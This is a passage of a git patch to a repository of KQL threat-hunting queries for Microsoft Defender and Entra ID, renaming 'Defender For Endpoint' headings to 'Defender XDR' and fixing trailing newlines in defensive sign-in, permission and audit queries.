From 1b6dca8b4c2c404c1bb57578ea93be61ae8256e1 Mon Sep 17 00:00:00 2001 From: Bert-Janp Date: Sun, 20 Oct 2024 15:36:52 +0200 Subject: [PATCH] Template Update --- Azure Active Directory/AllGraphPermissionsAdded.md | 2 +- Azure Active Directory/GraphMailPermissions.md | 2 +- Azure Active Directory/GroupMembershipReport.md | 2 +- .../MonitorCloudBreakGlassAccount.md | 2 +- Azure Active Directory/MultipleAccountsLocked.md | 2 +- Azure Active Directory/NewAuthenticationAppDetected.md | 2 +- Azure Active Directory/NewUserAgentUsed.md | 2 +- Azure Active Directory/PotentialAiTMPhishing.md | 4 ++-- Azure Active Directory/RoleReport.md | 2 +- Azure Active Directory/SignInFromSuspiciousIP.md | 2 +- Azure Active Directory/SignInsByBrowser.md | 2 +- Azure Active Directory/SignInsByOS.md | 2 +- Azure Active Directory/SignInsByUserAgent.md | 2 +- .../SuccessfulSignInFromNewCountry.md | 2 +- .../Top10UsersWithTheMostSignInIPsUsed.md | 2 +- .../TopNAccountsLongestPeriodWithoutPasswordReset.md | 2 +- .../TotalAllGraphPermissionsAdded.md | 2 +- ...tion - AccountsLongestPeriodWithoutPasswordReset.md | 2 +- ...pider_abuse conditional_access_trusted_locations.md | 2 +- Azure Resource Graph/README.md | 2 +- Cloud Audit Events/CloudResourceDeletion.md | 4 ++-- .../MDE - AllProcessesCreatedByMaliciousFile.md | 2 +- ...MDE - Antivirus-Detections-by-Compromised-Device.md | 2 +- ...DE - BrowserLaunchedToOpenUrlByCompromisedDevice.md | 2 +- ... - Connections-Made-By-Office-Compromised-Device.md | 2 +- .../MDE - FileEnrichmentOnSuspiciousFile.md | 2 +- DFIR/Defender For Endpoint/MDE - IPLookup.md | 2 +- .../MDE - InboundConnectionsCompromisedDevice.md | 2 +- ...MDE - InternalConnectionsMadeByCompromisedDevice.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- ...ostRecentPowershellExecutionsByCompromisedDevice.md | 2 +- DFIR/Defender For Endpoint/MDE - NetActivities.md | 2 +- ...MDE - Open-SMB-Connections-By-Compromised-Device.md | 2 +- .../MDE - Registry-Run-Keys-Forensics.md | 2 +- .../MDE - TriggeredASREventsFromCompromisedDevice.md | 2 +- DFIR/Defender For Endpoint/MDE - URLLookup.md | 2 +- ...MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md | 2 +- DFIR/Defender For Identity/MDI - ADGroupAdditions.md | 2 +- .../MDI - Devices-Accessed-By-Compromised-Device.md | 2 +- .../MDI - LDAPQueriesByCompromisedDevice.md | 2 +- .../MDI - Lateral-Movement-By-Compromised-Accounts.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- DFIR/Defender For Office/MDO- FindRelatedMails.md | 2 +- .../ExposureManagement - DeviceActivities.md | 2 +- DFIR/ExposureManagement - DeviceActivities.md | 2 +- DFIR/MDE - AllProcessesCreatedByMaliciousFile.md | 2 +- ...MDE - Antivirus-Detections-by-Compromised-Device.md | 2 +- ...DE - BrowserLaunchedToOpenUrlByCompromisedDevice.md | 2 +- ... - Connections-Made-By-Office-Compromised-Device.md | 2 +- DFIR/MDE - FileEnrichmentOnSuspiciousFile.md | 2 +- DFIR/MDE - IPLookup.md | 2 +- DFIR/MDE - InboundConnectionsCompromisedDevice.md | 2 +- ...MDE - InternalConnectionsMadeByCompromisedDevice.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- ...ostRecentPowershellExecutionsByCompromisedDevice.md | 2 +- DFIR/MDE - NetActivities.md | 2 +- ...MDE - Open-SMB-Connections-By-Compromised-Device.md | 2 +- DFIR/MDE - Registry-Run-Keys-Forensics.md | 2 +- DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md | 2 +- DFIR/MDE - URLLookup.md | 2 +- ...MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md | 2 +- DFIR/MDI - ADGroupAdditions.md | 2 +- DFIR/MDI - Devices-Accessed-By-Compromised-Device.md | 2 +- DFIR/MDI - LDAPQueriesByCompromisedDevice.md | 2 +- DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md | 2 +- DFIR/MDO- FindRelatedMails.md | 2 +- Defender For Cloud Apps/ATPDetectionEvents.md | 2 +- .../AccountsWithMostImpersonatedActions.md | 2 +- Defender For Cloud Apps/AnonymousProxyEvents.md | 2 +- Defender For Cloud Apps/DefenseEvasionAlerts.md | 2 +- Defender For Cloud Apps/ExternalAdminActivities.md | 2 +- .../FileContainingMalwareDetected.md | 2 +- Defender For Cloud Apps/HardUserDelete.md | 4 ++-- Defender For Cloud Apps/MITREBehaviors.md | 4 ++-- .../MaliciousEmailDeliveredInMailbox.md | 2 +- Defender For Cloud Apps/MostImpersonatorsByAccount.md | 2 +- Defender For Cloud Apps/OneDriveSyncFromRareIP.md | 2 +- Defender For Cloud Apps/RiskyIPActivities.md | 2 +- Defender For Cloud Apps/SupressionRuleCreations.md | 2 +- .../Visualization - ActionsPerformed.md | 2 +- .../Visualization - HardDeletionsByUser.md | 2 +- .../Visualization - OperationsPerformed.md | 2 +- .../Visualization - OutdatedOSUsed.md | 2 +- Defender For Endpoint/AMSIScriptDetections.md | 4 ++-- .../ASR Rules/ASR-RulesTriggeredByDevice.md | 2 +- .../ASR Rules/AsrExecutableOfficeContent.md | 4 ++-- Defender For Endpoint/ASR Rules/AsrRansomware.md | 2 +- Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md | 2 +- Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md | 2 +- Defender For Endpoint/AnomalousSMBSessionsCreated.md | 2 +- Defender For Endpoint/BloodHoundProcessDetection.md | 2 +- Defender For Endpoint/CommandlineGroupAddition.md | 4 ++-- Defender For Endpoint/CommandlineUserAddition.md | 4 ++-- .../CommandlineWithClearTextPassword.md | 4 ++-- Defender For Endpoint/DefenderDiscoveryActivities.md | 4 ++-- .../Detect_Known_RAT_RMM_Process_Patterns.md | 2 +- Defender For Endpoint/DevicesWithMostSMBConnections.md | 2 +- Defender For Endpoint/DevicesWithTheMostSMBSessions.md | 2 +- Defender For Endpoint/Discovery - DatabaseServices.md | 2 +- Defender For Endpoint/ExecutableFilesPublicFolder.md | 4 ++-- Defender For Endpoint/ExploitGuardNetworkProtection.md | 4 ++-- Defender For Endpoint/HTTPDownloadsByFileExtention.md | 2 +- Defender For Endpoint/HTTPExecutableFilesDownloaded.md | 2 +- Defender For Endpoint/HTTPRequestMethodsStatistics.md | 2 +- Defender For Endpoint/LatestAntivirusScanStatus.md | 4 ++-- .../Linux/Linux - UsersAddedToSudoersGroup.md | 2 +- Defender For Endpoint/ListTamperingAttempts.md | 4 ++-- .../Living Off The Land/CertutilRemoteDownload.md | 4 ++-- .../Living Off The Land/LOLBinRemoteIPCommandLine.md | 2 +- .../Living Off The Land/LOLBinStatistics.md | 2 +- .../Living Off The Land/LOLDriverUsage.md | 2 +- Defender For Endpoint/Living Off The Land/LOTSUsage.md | 4 ++-- .../Living Off The Land/NewLOLBinExternalConnection.md | 2 +- .../Living Off The Land/RMMConnection.md | 2 +- .../Living Off The Land/WMICRemoteCommand.md | 2 +- Defender For Endpoint/LocalAccountCreated.md | 2 +- Defender For Endpoint/LocalAdminAdditions.md | 4 ++-- .../LocalAdminsWithTheMostDevicesAccessed.md | 2 +- Defender For Endpoint/LocalFirewallAdditions.md | 2 +- Defender For Endpoint/LocalFirewallDeletions.md | 2 +- Defender For Endpoint/LocalGroupCreation.md | 4 ++-- Defender For Endpoint/LocalGroupDiscovery.md | 4 ++-- .../MultipleSentitiveGroupAdditions.md | 4 ++-- Defender For Endpoint/NTDSDitFileModifications.md | 2 +- Defender For Endpoint/NetDiscoveryActivities.md | 4 ++-- .../NetDiscoveryActivitiesDetected.md | 4 ++-- Defender For Endpoint/NetQueryStatistics.md | 4 ++-- .../Network - AnyDeskConnectionToPublicIP.md | 2 +- .../Network - DevicesWithMostOpenPorts.md | 2 +- .../Network - InterestingOpenPorts.md | 2 +- Defender For Endpoint/Network - OpenDatabasePorts.md | 2 +- .../Network - OpenRemoteServicePorts.md | 2 +- Defender For Endpoint/NewRDPConnections.md | 2 +- Defender For Endpoint/NewSysinternalToolDetected.md | 2 +- Defender For Endpoint/NltestDiscovery.md | 2 +- Defender For Endpoint/OutboundConhostConnection.md | 4 ++-- Defender For Endpoint/PSExecExecutions.md | 4 ++-- .../PowerShellEncodedCommandsByDevice.md | 2 +- .../PowerShellEncodedCommandsExecuted.md | 2 +- .../PowerShellEncodedReconActivities.md | 2 +- Defender For Endpoint/PowerShellEncodedWebRequests.md | 2 +- Defender For Endpoint/PowerShellInvokeWebrequest.md | 4 ++-- Defender For Endpoint/PowerShellNoProfile.md | 4 ++-- Defender For Endpoint/PublicFacingDeviceScanned.md | 2 +- .../QakbotPostCompromiseCommandsExecuted.md | 2 +- .../Ransomware/KillNetRansomwareDetection.md | 2 +- .../Ransomware/RansomwareDoubleExtention.md | 2 +- .../Ransomware/RansomwareExtensionFound.md | 2 +- .../Ransomware/RansomwareNoteFound.md | 2 +- Defender For Endpoint/RareConnectionsMadeByOffice.md | 2 +- Defender For Endpoint/RareISOFile.md | 4 ++-- Defender For Endpoint/RareNetParamaterExecutions.md | 4 ++-- .../Rare_Outgoing_IPv4_Connections.md | 2 +- .../Regsvr32StartedByOfficeApplication.md | 2 +- Defender For Endpoint/RemoteSMBConnection.md | 2 +- Defender For Endpoint/RunasWithSavedCredentials.md | 4 ++-- Defender For Endpoint/SMBSessionsByDevice.md | 2 +- Defender For Endpoint/SMBSessionsByFileName.md | 2 +- Defender For Endpoint/SMBSessionsGeneratedByFile.md | 2 +- Defender For Endpoint/SecurityLogCleared.md | 4 ++-- Defender For Endpoint/ShadowCopyDeletion.md | 2 +- Defender For Endpoint/SmartScreen/SmartScreenEvents.md | 2 +- .../SmartScreen/SmartScreenOverride.md | 2 +- Defender For Endpoint/USB/ConnectedPnPTypes.md | 4 ++-- Defender For Endpoint/USB/USBConnectors.md | 4 ++-- .../Visualizations/Visualization - FileTypes.md | 2 +- .../Visualization - InspectedNetworkSignatures.md | 2 +- .../Visualization - LogonFailureReasons.md | 2 +- .../Visualization - SysinternalToolUsage.md | 2 +- .../Visualization - UnauthorizedLogonsByAccount.md | 2 +- .../Visualization- DefenderMachineGroups.md | 2 +- Defender For Endpoint/WMICAntivirusDiscovery.md | 2 +- Defender For Endpoint/WebshellDetection.md | 2 +- Defender For Endpoint/WevtutilClearLogs.md | 4 ++-- Defender For Endpoint/WindowsNetworkSniffing.md | 2 +- ..._ttp_t1543_peach-sandstorm_azure_arc_persistence.md | 2 +- .../ttp_t1027-010_powershellEncodedCommand.md | 2 +- .../ttp_t1059-001_powershell_windowsappsdir_fin7.md | 2 +- .../ttp_t1127-001_suspNetworkConnMSBuild.md | 2 +- Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md | 2 +- Defender For Endpoint/ttp_t1562-001_disabledefender.md | 2 +- .../AccountWithPasswordNeverExpiresEnabled.md | 2 +- Defender For Identity/AnomalousGroupPolicyDiscovery.md | 2 +- Defender For Identity/AnomalousLDAPTraffic.md | 4 ++-- ...wLateralMovementPathToSensitiveAccountIdentified.md | 2 +- .../PasswordChangeAfterSuccesfulBruteForce.md | 4 ++-- .../PotentialKerberosEncryptionDowngrade.md | 4 ++-- Defender For Identity/SMBFileCopy.md | 2 +- Defender For Identity/UserAddedToSensitiveGroup.md | 2 +- .../Visualization - ClearTextLDAPSignIns.md | 2 +- .../Visualization - MostInteractiveSignInsByUser.md | 2 +- Defender XDR/AlertSupressionAdded.md | 4 ++-- Defender XDR/CustomDetectionDeletion.md | 4 ++-- Defender XDR/CustomDetectionReport.md | 2 +- Defender XDR/DeviceIsolation.md | 4 ++-- Defender XDR/DeviceRemovedFromIsolation.md | 4 ++-- Defender XDR/LiveResponseFileCollection.md | 4 ++-- Defender XDR/LiveResponseUnsignedPowerShellChanges.md | 4 ++-- Defender XDR/ManualAntivirusScans.md | 4 ++-- Defender XDR/OffboardingPackageDownloaded.md | 4 ++-- Defender XDR/RBACChanges.md | 4 ++-- DetectionTemplate.md | 2 +- Exposure Management/MostPermissiveEntities.md | 4 ++-- Fun/KQLQueryVisits.md | 4 ++-- Fun/KQLSearchVisits.md | 4 ++-- Fun/MailItemsAccessed.md | 2 +- Fun/TeamsEmojiReactions.md | 4 ++-- Fun/TeamsEmojiReactionsByDepartment.md | 4 ++-- Functions/CollectIncidentStatistics.md | 2 +- Functions/DeviceCommandLinePublicIPs.md | 4 ++-- Functions/IsDomainController.md | 2 +- Functions/LastPowerShellExecutions.md | 2 +- Functions/ListAllActionsAndOperations.md | 2 +- Functions/ListCISAExploitedVulnerabilites.md | 4 ++-- Functions/ListDomainControllers.md | 2 +- Functions/UserRiskStatus.md | 2 +- .../AppEnrichmentAADNonInteractiveUserSignInLogs.md | 2 +- Graph API/AppEnrichmentExternalData.md | 2 +- Graph API/AzureHound.md | 2 +- Graph API/GraphResourceAPIRequestStats.md | 2 +- Graph API/GraphURIAPIRequestStats.md | 2 +- Graph API/IPEnrichment.md | 2 +- Graph API/UserEnrichment.md | 2 +- KQL Regex/RegexExamples.md | 2 +- Log Analytics/LogAnalyticsQueryStatistics.md | 2 +- MISP/MISP Feed Implementation Status/README.md | 2 +- MISP/README.md | 4 ++-- Office 365/AnomalousAmountofURLClickEvents.md | 2 +- Office 365/Email - ASRExecutableContentTriggered.md | 4 ++-- Office 365/Email - ExecutableFileRecieved.md | 2 +- Office 365/Email - ISOAttachmentRecieved.md | 4 ++-- .../Email - MacroAttachmentOpenedFromRareSender.md | 4 ++-- Office 365/Email - MostRareFileExtensionsRecieved.md | 4 ++-- Office 365/Email - PotentialPhishingCampaign.md | 4 ++-- Office 365/Email - SafeLinksTrigger.md | 4 ++-- Office 365/ListSafeLinkEvents.md | 2 +- .../Visualization - Email - MalwareDetectionReasons.md | 4 ++-- .../Visualization - Email - PhishDetectionReasons.md | 4 ++-- .../Visualization - Email - PostDeliveryEvents.md | 4 ++-- README.md | 2 +- Security Operations/ComparisonIntuneandMDEDevices.md | 2 +- Security Operations/DevicesCanBeOnboarded.md | 4 ++-- Security Operations/OnboardedDeviceByOS.md | 4 ++-- Security Operations/README.md | 2 +- .../Statistics - MostTriggeredIncidents.md | 4 ++-- .../Statistics - MostTriggeredMitreTechniques.md | 4 ++-- Security Operations/TotalEventsByTable.md | 2 +- .../Visualization - AntivirusEventsByDay.md | 2 +- .../Visualization - DailyIncidentTriggers.md | 4 ++-- .../Visualization - DailyTableEvents.md | 4 ++-- .../Visualization - ThreatIntelligenceThreatTypes.md | 2 +- Security Operations/XDRAutomaticallyClosedIncidents.md | 2 +- SecurityEvents/NltestDiscovery.md | 2 +- Sentinel/AnalyticsRulesEfficiency.md | 2 +- Sentinel/ListGlobalAdmins.md | 2 +- Sentinel/SentinelAnomalies.md | 2 +- Sentinel/Summary Rules/AzureHound.md | 2 +- Sentinel/Summary Rules/EntraGroupMembershipReport.md | 2 +- Sentinel/Summary Rules/EntraRolesReport.md | 2 +- Sentinel/Summary Rules/README.md | 2 +- Sentinel/Summary Rules/UniqueActions.md | 2 +- .../Visualization - IncidentsTriggeredByMitreTactic.md | 2 +- ...ualization - IncidentsTriggeredByMitreTechniques.md | 2 +- Threat Hunting Cases/HTTP Traffic.md | 10 +++++----- Threat Hunting Cases/Suspicious Encoded Powershell.md | 8 ++++---- Threat Hunting Cases/Suspicious SMB Sessions.md | 10 +++++----- Threat Hunting/Behavior - AsyncRATInitialAccess.md | 2 +- .../Behavior - InboundConnectionFromMaliciousIP.md | 2 +- Threat Hunting/Behavior - TelegramC2.md | 2 +- Threat Hunting/Behaviour - APT28Commands.md | 4 ++-- Threat Hunting/Behaviour - APT28ExternalWebdav.md | 4 ++-- Threat Hunting/Behaviour - KillSQLProcesses.md | 4 ++-- Threat Hunting/IOC - BlackCatRansomware.md | 2 +- Threat Hunting/IOC - CiscoYanluowangRansomware.md | 2 +- Threat Hunting/IOC - NighthawkRat.md | 2 +- Threat Hunting/Ransomware - APTNotesJoinTable.md | 4 ++-- Threat Hunting/Ransomware - APTNotesSHA1IOC.md | 4 ++-- Threat Hunting/Ransomware - LeaksiteMontitoring.md | 2 +- Threat Hunting/STORM-0539 URLPathsEmail.md | 4 ++-- Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md | 2 +- Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md | 2 +- Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md | 4 ++-- Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md | 2 +- Threat Hunting/TI Feed - AbuseCHMD5Malware.md | 4 ++-- Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md | 4 ++-- Threat Hunting/TI Feed - C2IPFeed.md | 2 +- Threat Hunting/TI Feed - C2URLFeed.md | 2 +- Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md | 2 +- Threat Hunting/TI Feed - CERT-FR-MISPFeed.md | 2 +- Threat Hunting/TI Feed - DigitalSideDomains.md | 4 ++-- Threat Hunting/TI Feed - DigitalSideIPs.md | 4 ++-- Threat Hunting/TI Feed - JA3Blacklist.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 4.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 5.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 6.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 7.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 8.md | 2 +- .../TI Feed - MontySecurity C2 Tracker All IPs.md | 2 +- Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md | 4 ++-- ...I Feed - ThreatviewioDomain-High-Confidence-Feed.md | 2 +- .../TI Feed - ThreatviewioIP-High-Confidence-Feed.md | 2 +- Threat Hunting/TI Feed - TwitterIOCs.md | 2 +- Threat Hunting/TI Feed - ipfs_phishing.md | 2 +- Windows Security Events/ListADDelegations.md | 2 +- Zero Day Detection/MS Exchange Zero Day Sept 2022.md | 2 +- 305 files changed, 397 insertions(+), 397 deletions(-) diff --git a/Azure Active Directory/AllGraphPermissionsAdded.md b/Azure Active Directory/AllGraphPermissionsAdded.md index 5ded9bc..40f66b5 100644 --- a/Azure Active Directory/AllGraphPermissionsAdded.md +++ b/Azure Active Directory/AllGraphPermissionsAdded.md @@ -32,4 +32,4 @@ AuditLogs | extend ServicePrincipalAppId = replace_string(tostring(todynamic(TargetResources).modifiedProperties[5].newValue),'"','') | where AddedPermission endswith ".All" | project-reorder TimeGenerated, InitiatedByUserPrincipalName, ActivityDisplayName, AddedPermission, IP, ServicePrincipalAppId -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/GraphMailPermissions.md b/Azure Active Directory/GraphMailPermissions.md index 8d74919..52e4763 100644 --- a/Azure Active Directory/GraphMailPermissions.md +++ b/Azure Active Directory/GraphMailPermissions.md @@ -36,4 +36,4 @@ AuditLogs | extend TotalPermissions = array_length(Permissions) | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions | sort by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/GroupMembershipReport.md b/Azure Active Directory/GroupMembershipReport.md index 872b240..69f1401 100644 --- a/Azure Active Directory/GroupMembershipReport.md +++ b/Azure Active Directory/GroupMembershipReport.md @@ -28,4 +28,4 @@ IdentityInfo | where isnotempty(GroupMembership) | summarize TotalMemberships = dcount(tostring(GroupMembership)), MemberOf = make_set(tostring(GroupMembership), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/MonitorCloudBreakGlassAccount.md b/Azure Active Directory/MonitorCloudBreakGlassAccount.md index c42d8ca..5697f55 100644 --- a/Azure Active Directory/MonitorCloudBreakGlassAccount.md +++ b/Azure Active Directory/MonitorCloudBreakGlassAccount.md @@ -11,7 +11,7 @@ If an attacker could get access to a break glass account, this account could be #### Author - **Github: https://github.com/erikgruetter** -## Defender For Endpoint +## Defender XDR ``` AADSignInEventsBeta | where AccountDisplayName == "Input display name of account here" diff --git a/Azure Active Directory/MultipleAccountsLocked.md b/Azure Active Directory/MultipleAccountsLocked.md index 99c10b7..51258bc 100644 --- a/Azure Active Directory/MultipleAccountsLocked.md +++ b/Azure Active Directory/MultipleAccountsLocked.md @@ -29,4 +29,4 @@ SigninLogs | where TotalAccounts >= Threshold | extend GeoIPInfo = geo_info_from_ip_address(IPAddress) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city) -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/NewAuthenticationAppDetected.md b/Azure Active Directory/NewAuthenticationAppDetected.md index 97c113f..bc2603a 100644 --- a/Azure Active Directory/NewAuthenticationAppDetected.md +++ b/Azure Active Directory/NewAuthenticationAppDetected.md @@ -20,7 +20,7 @@ A malicious actor installs a malicious app in your environment. This app can the - https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-compromised-malicious-app - https://www.lares.com/blog/malicious-azure-ad-application-registrations/ -## Defender For Endpoint +## Defender XDR ```KQL let KnownApps = AADSignInEventsBeta // Adjust the timerange depending on the retention period diff --git a/Azure Active Directory/NewUserAgentUsed.md b/Azure Active Directory/NewUserAgentUsed.md index c40c9f0..5149b08 100644 --- a/Azure Active Directory/NewUserAgentUsed.md +++ b/Azure Active Directory/NewUserAgentUsed.md @@ -10,7 +10,7 @@ False positives can be new browser updates that trigger new UserAgents, this wil #### Risk A malicious actor signs in to your tenant with a user agent that is not user in your environment. It can also be a script that uses (leaked) credentials on your tentant. -## Defender For Endpoint +## Defender XDR ```KQL let KnownUserAgents = AADSignInEventsBeta | where Timestamp > ago(30d) and Timestamp < ago(3d) diff --git a/Azure Active Directory/PotentialAiTMPhishing.md b/Azure Active Directory/PotentialAiTMPhishing.md index 4fc7dcc..6a5a5d4 100644 --- a/Azure Active Directory/PotentialAiTMPhishing.md +++ b/Azure Active Directory/PotentialAiTMPhishing.md @@ -21,7 +21,7 @@ Adversary in the middle phishing has successfully been peformed on a user and th - https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166 - https://jeffreyappel.nl/aitm-mfa-phishing-attacks-in-combination-with-new-microsoft-protections-2023-edt/ -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where Application == "OfficeHome" @@ -41,4 +41,4 @@ SigninLogs | summarize RiskLevels = make_set(RiskLevelDuringSignIn), ResultTypes = make_set(ResultType), IPs = make_set(IPAddress) by CorrelationId, UserPrincipalName // Optional to only filter on events with a RiskLevel during the sign-in //| where RiskLevels has_any ("low", "medium", "high") -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/RoleReport.md b/Azure Active Directory/RoleReport.md index deaa8df..16c389b 100644 --- a/Azure Active Directory/RoleReport.md +++ b/Azure Active Directory/RoleReport.md @@ -28,4 +28,4 @@ IdentityInfo | summarize TotalRoles = dcount(tostring(AssignedRoles)), MemberOf = make_set(tostring(AssignedRoles), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() | sort by TotalRoles desc -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/SignInFromSuspiciousIP.md b/Azure Active Directory/SignInFromSuspiciousIP.md index 546d96d..dc77da5 100644 --- a/Azure Active Directory/SignInFromSuspiciousIP.md +++ b/Azure Active Directory/SignInFromSuspiciousIP.md @@ -24,4 +24,4 @@ let IPs = ThreatIntelligenceIndicator SigninLogs | where IPAddress in (IPs) | project TimeGenerated, UserPrincipalName, IPAddress, Location -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/SignInsByBrowser.md b/Azure Active Directory/SignInsByBrowser.md index efdb405..94311f7 100644 --- a/Azure Active Directory/SignInsByBrowser.md +++ b/Azure Active Directory/SignInsByBrowser.md @@ -6,7 +6,7 @@ This query lists all the different browsers that are used to succesfully sign in to your Entra ID Tenant. This could be used to detect rare browsers that are used to sign into your tenant. -## Defender For Endpoint +## Defender XDR ```KQLAADSignInEventsBeta | where isnotempty(UserAgent) // Filter for successful sign ins only diff --git a/Azure Active Directory/SignInsByOS.md b/Azure Active Directory/SignInsByOS.md index edf3cc6..1cb552b 100644 --- a/Azure Active Directory/SignInsByOS.md +++ b/Azure Active Directory/SignInsByOS.md @@ -7,7 +7,7 @@ This query can be used to detect rare operating systems that are used to sign in This query can also be used to determine with Operting Systems need to be added to your Conditional Access Policies. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where isnotempty(UserAgent) diff --git a/Azure Active Directory/SignInsByUserAgent.md b/Azure Active Directory/SignInsByUserAgent.md index 597b3cd..ae727bf 100644 --- a/Azure Active Directory/SignInsByUserAgent.md +++ b/Azure Active Directory/SignInsByUserAgent.md @@ -7,7 +7,7 @@ This query can be used to detect rare UserAgents that are used to sign into your The query can be extended by filtering on succesful and failed sign ins. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | summarize count() by UserAgent diff --git a/Azure Active Directory/SuccessfulSignInFromNewCountry.md b/Azure Active Directory/SuccessfulSignInFromNewCountry.md index 41ab10a..0d2d176 100644 --- a/Azure Active Directory/SuccessfulSignInFromNewCountry.md +++ b/Azure Active Directory/SuccessfulSignInFromNewCountry.md @@ -8,7 +8,7 @@ This query detects successful signins from countries that have not been seen bef #### Risk An adversary signs in from a new country to your azure AD tenant. -## Defender For Endpoint +## Defender XDR ```KQL let KnownCountries = AADSignInEventsBeta | where Timestamp > ago(30d) and Timestamp < ago(3d) diff --git a/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md b/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md index 2dcd60e..e6820b1 100644 --- a/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md +++ b/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md @@ -10,7 +10,7 @@ False positives can be a VPN that changes IP addresses, which results in a high #### Risk The risk is that an actor uses an rare IP address to sign into your tenant. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | summarize IPsUsed = make_set(IPAddress), locations = make_set(Country) by AccountObjectId diff --git a/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md b/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md index 0e11aa7..375ec57 100644 --- a/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md +++ b/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md @@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does #### References - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let LatestNChanges = 100; AADSignInEventsBeta diff --git a/Azure Active Directory/TotalAllGraphPermissionsAdded.md b/Azure Active Directory/TotalAllGraphPermissionsAdded.md index 60a3023..d0bb3ea 100644 --- a/Azure Active Directory/TotalAllGraphPermissionsAdded.md +++ b/Azure Active Directory/TotalAllGraphPermissionsAdded.md @@ -30,4 +30,4 @@ AuditLogs | extend TotalPermissions = array_length(Permissions) | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions | sort by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md b/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md index 6194bc3..aaf8695 100644 --- a/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md +++ b/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md @@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does #### References - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where Timestamp > ago(30d) diff --git a/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md b/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md index ef6cda0..1cb6548 100644 --- a/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md +++ b/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md @@ -25,7 +25,7 @@ The risk addressed here is the manipulation of access controls to evade detectio - [Microsoft Documentation on Conditional Access Policies](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/) - [MITRE ATT&CK on Defense Evasion](https://attack.mitre.org/tactics/TA0005/) -## Defender For Endpoint +## Defender XDR ```KQL AuditLogs | where OperationName =~ "Update conditional access policy" and TargetResources has_all ('locations','excludeLocations') diff --git a/Azure Resource Graph/README.md b/Azure Resource Graph/README.md index 4380df6..29d8da7 100644 --- a/Azure Resource Graph/README.md +++ b/Azure Resource Graph/README.md @@ -52,4 +52,4 @@ Microsoft has provided various KQL examples that can be used in your environment When using the docs, select portal to get the KQL queries as marked below. -![Azure Resource Graph Docs](Images/Portal.png) \ No newline at end of file +![Azure Resource Graph Docs](Images/Portal.png) diff --git a/Cloud Audit Events/CloudResourceDeletion.md b/Cloud Audit Events/CloudResourceDeletion.md index bb50a5b..1729001 100644 --- a/Cloud Audit Events/CloudResourceDeletion.md +++ b/Cloud Audit Events/CloudResourceDeletion.md @@ -17,7 +17,7 @@ An actor deletes multiple cloud resources to create impact. #### References - https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-cloudauditevents-table -## Defender For Endpoint +## Defender XDR ```KQL let Threshold = 20; let BinSize = 1d; @@ -25,4 